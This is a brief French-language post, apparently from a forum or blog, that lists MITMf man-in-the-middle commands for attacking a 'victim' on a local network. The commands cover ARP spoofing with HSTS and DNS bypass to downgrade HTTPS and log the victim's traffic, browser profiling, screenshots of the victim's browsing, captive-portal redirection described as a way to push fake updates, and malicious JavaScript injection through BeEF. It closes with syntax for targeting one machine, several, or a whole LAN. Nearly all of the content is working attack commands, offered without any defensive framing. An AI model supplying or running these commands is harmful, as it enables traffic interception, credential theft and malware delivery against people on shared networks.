Salut je vais vous présentez quelque commande du framework MITMF
https://github.com/byt3bl33d3r/MITMfCette commande permet de bypass le https en http, les résultats se seront stocker dans le fichier /MITMf/log/mitmf.log
python mitmf.py -i wlan0 --spoof --arp --hsts --dns --gateway 192.168.&.& --target 192.168.&.&
Cette commande permet d'avoir des information sur la navigateur web de notre victime et de savoir les site sur quel elle est
python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.&.& --browserprofiler
Cette commande permet de prendre des screenshots sur le navigateur web de notre victime attention fonctionnent que sur les site http
Résultats stocker dans le dossier /MITMf/logs
python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.&.& --screen
Cette commande permet de inversé le page de web de notre victime en 180° attention fonctionnent que sur les sites en http
python mitmf.py --spoof --arp -i wlan0 --gateway 192.168.&.& --upsidedownternet
Cette la c'est commande préférer commande elle permet de redirect sur notre victime sur un url, utilise pour les fakeupdate, attention marche sur les site en http
python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.&.& --captive --portalurl http://192.168.&.&
Injection de code via malveillant javascript en utilisant le framework beff-xss
python mitmf.py -i wlan0 --gateway 192.168.&.& --target 192.168.&.& --spoof --arp --inject --js-url
--gateway &.&.&.& = tout le résaux local cibler
--gateway &.&.&.& --target &.&.&.& = un seul machine cibler
--gateway &.&.&.& --target &.&.&.&,&.&.&.& = plusieur machines cibler